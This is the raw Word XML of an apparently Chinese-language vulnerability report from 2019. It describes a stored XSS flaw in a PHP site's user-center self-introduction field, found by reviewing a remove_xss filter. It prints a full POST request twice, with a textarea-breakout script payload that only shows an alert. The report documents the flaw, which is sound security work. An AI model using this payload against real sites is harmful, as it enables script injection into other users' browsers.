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8038E" w14:textId="7CB2DB57" w:rsidR="005F3A08" w:rsidRPr="0023641A" w:rsidRDefault="00676F21">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在网站源码收索关键字</w:t>
      </w:r>
      <w:r w:rsidR="004F5793">
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="004F5793">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发现网站存在去除</w:t>
      </w:r>
      <w:r w:rsidR="0023641A">
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="0023641A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r w:rsidR="0023641A" w:rsidRPr="0023641A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>remove_xss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34899420" w14:textId="0180AB3F" w:rsidR="00676F21" w:rsidRDefault="00676F21">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A75AB25" wp14:editId="19C01DE9">
            <wp:extent cx="5274310" cy="3277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4922" w14:textId="11CA4A46" w:rsidR="00F2059D" w:rsidRDefault="005924CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对自我介绍关键字进行搜索。</w:t>
      </w:r>
      <w:r w:rsidR="008F0176">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现在关键字附近不存在标识信息来确认输入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7C8F7F" w14:textId="2C5B628B" w:rsidR="00D1227A" w:rsidRDefault="002F1A54">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A439AE2" wp14:editId="53B681EF">
            <wp:extent cx="5274310" cy="23933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E7AB" w14:textId="77777777" w:rsidR="007669D9" w:rsidRDefault="005924CB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31933D76" wp14:editId="2E2DEC06">
            <wp:extent cx="5274310" cy="1882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A4FC" w14:textId="5BE282AC" w:rsidR="00D95C2C" w:rsidRDefault="007669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721171" wp14:editId="715B75D9">
            <wp:extent cx="5274310" cy="1910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C2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后发现对于用户的相关信息会返回到数组中。</w:t>
      </w:r>
      <w:r w:rsidR="00232DC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间过程未发现和目标字段相关判断。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA30BFC" w14:textId="46DC2464" w:rsidR="00D95C2C" w:rsidRDefault="00D95C2C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57A914AD" wp14:editId="27141E76">
            <wp:extent cx="5274310" cy="6003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E766" w14:textId="17C8A3E5" w:rsidR="008F0176" w:rsidRDefault="00AE54EA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击验证如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07443B5F" w14:textId="5FA6614F" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA"/>
    <w:p w14:paraId="486068F3" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7989EA2C" wp14:editId="3AE98369">
            <wp:extent cx="5274310" cy="2916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1555" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B631C80" wp14:editId="14492DAC">
            <wp:extent cx="5274310" cy="33686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7120" w14:textId="031DCFC6" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5669EAC9" wp14:editId="38610FEA">
            <wp:extent cx="5274310" cy="32816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9541" w14:textId="0B92D384" w:rsidR="009B3DCC" w:rsidRDefault="009B3DCC" w:rsidP="00AE54EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包内容如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359CBF94" w14:textId="28C5B3FD" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA"/>
    <w:p w14:paraId="596E5A45" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRPr="0018091A" w:rsidRDefault="00AE54EA" w:rsidP="00AE54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260B06" wp14:editId="5C81C6BC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-542925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6109970" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="24130" b="2159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99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774D4" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                            <w:r>
                              <w:t>POST /index.php?m=ucenter&amp;a=index HTTP/1.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0AF9BAC4" w14:textId="2BBF8CD8" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54E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Host: 192.1</w:t>
                            </w:r>
                            <w:r w:rsidR="00D2108F">
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t>.</w:t>
                            </w:r>
                            <w:r w:rsidR="00D2108F">
                              <w:t>xxx.xxx</w:t>
                            </w:r>
                            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
                            <w:bookmarkEnd w:id="0"/>
                          </w:p>
                          <w:p w14:paraId="297EAB33" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                            <w:r>
                              <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7B7A8DA1" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                            <w:r>
                              <w:t>Accept: */*</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="27984BFB" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                            <w:r>
                              <w:t>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="18A7A4A4" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                            <w:r>
                              <w:t>Content-Type: application/x-www-form-urlencoded; charset=UTF-8</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7263F3DA" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>X-Requested-With: XMLHttpRequest</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7F8EEEF3" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                            <w:r>
                              <w:t>Content-Length: 119</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2971CAC1" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                            <w:r>
                              <w:t>Connection: close</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0D7C05F0" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                            <w:r>
                              <w:t>Referer: http://192.168.8.100/index.php?m=ucenter&amp;a=index</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="69FC8806" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                            <w:r>
                              <w:t>Cookie: PHPSESSID=pofhmcs4be67uvjuo8vg83ecm7</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="17FB4518" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA"/>
                          <w:p w14:paraId="1D966750" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                            <w:r>
                              <w:t>gender=2&amp;birthday=&amp;province=%E5%85%A8%E9%83%A8&amp;city=%E5%85%A8%E9%83%A8&amp;county=%E5%85%A8%E9%83%A8&amp;contact=0&amp;intro=</w:t>
                            </w:r>
                            <w:r w:rsidRPr="000A31E5">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                              <w:t>&lt;/textarea&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2E062761" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRPr="00C12819" w:rsidRDefault="00AE54EA" w:rsidP="00AE54E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260B0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42.75pt;margin-top:0;width:481.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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="3B6774D4" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                      <w:r>
                        <w:t>POST /index.php?m=ucenter&amp;a=index HTTP/1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0AF9BAC4" w14:textId="2BBF8CD8" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Host: 192.1</w:t>
                      </w:r>
                      <w:r w:rsidR="00D2108F">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>.</w:t>
                      </w:r>
                      <w:r w:rsidR="00D2108F">
                        <w:t>xxx.xxx</w:t>
                      </w:r>
                      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
                      <w:bookmarkEnd w:id="1"/>
                    </w:p>
                    <w:p w14:paraId="297EAB33" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                      <w:r>
                        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7B7A8DA1" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                      <w:r>
                        <w:t>Accept: */*</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="27984BFB" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                      <w:r>
                        <w:t>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="18A7A4A4" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                      <w:r>
                        <w:t>Content-Type: application/x-www-form-urlencoded; charset=UTF-8</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7263F3DA" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>X-Requested-With: XMLHttpRequest</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7F8EEEF3" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                      <w:r>
                        <w:t>Content-Length: 119</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2971CAC1" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                      <w:r>
                        <w:t>Connection: close</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0D7C05F0" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                      <w:r>
                        <w:t>Referer: http://192.168.8.100/index.php?m=ucenter&amp;a=index</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="69FC8806" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                      <w:r>
                        <w:t>Cookie: PHPSESSID=pofhmcs4be67uvjuo8vg83ecm7</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="17FB4518" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA"/>
                    <w:p w14:paraId="1D966750" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
                      <w:r>
                        <w:t>gender=2&amp;birthday=&amp;province=%E5%85%A8%E9%83%A8&amp;city=%E5%85%A8%E9%83%A8&amp;county=%E5%85%A8%E9%83%A8&amp;contact=0&amp;intro=</w:t>
                      </w:r>
                      <w:r w:rsidRPr="000A31E5">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t>&lt;/textarea&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2E062761" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRPr="00C12819" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEFFD94" w14:textId="77777777" w:rsidR="00AE54EA" w:rsidRDefault="00AE54EA" w:rsidP="00AE54EA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00AE54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936"/>
    <w:rsid w:val="00232DC1"/>
    <w:rsid w:val="0023641A"/>
    <w:rsid w:val="002F1A54"/>
    <w:rsid w:val="004C5EA4"/>
    <w:rsid w:val="004F5793"/>
    <w:rsid w:val="00573CA6"/>
    <w:rsid w:val="005924CB"/>
    <w:rsid w:val="005F3A08"/>
    <w:rsid w:val="00676F21"/>
    <w:rsid w:val="007669D9"/>
    <w:rsid w:val="007C0936"/>
    <w:rsid w:val="008F0176"/>
    <w:rsid w:val="009B3DCC"/>
    <w:rsid w:val="00AE54EA"/>
    <w:rsid w:val="00D1227A"/>
    <w:rsid w:val="00D2108F"/>
    <w:rsid w:val="00D95C2C"/>
    <w:rsid w:val="00E16163"/>
    <w:rsid w:val="00F2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9071E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2BB5B605-04F0-46CD-BA56-67D5B3EDD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E54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85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SWALLOW</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>YAN SWALLOW</cp:lastModifiedBy>
  <cp:revision>32</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-09T02:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-09T03:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>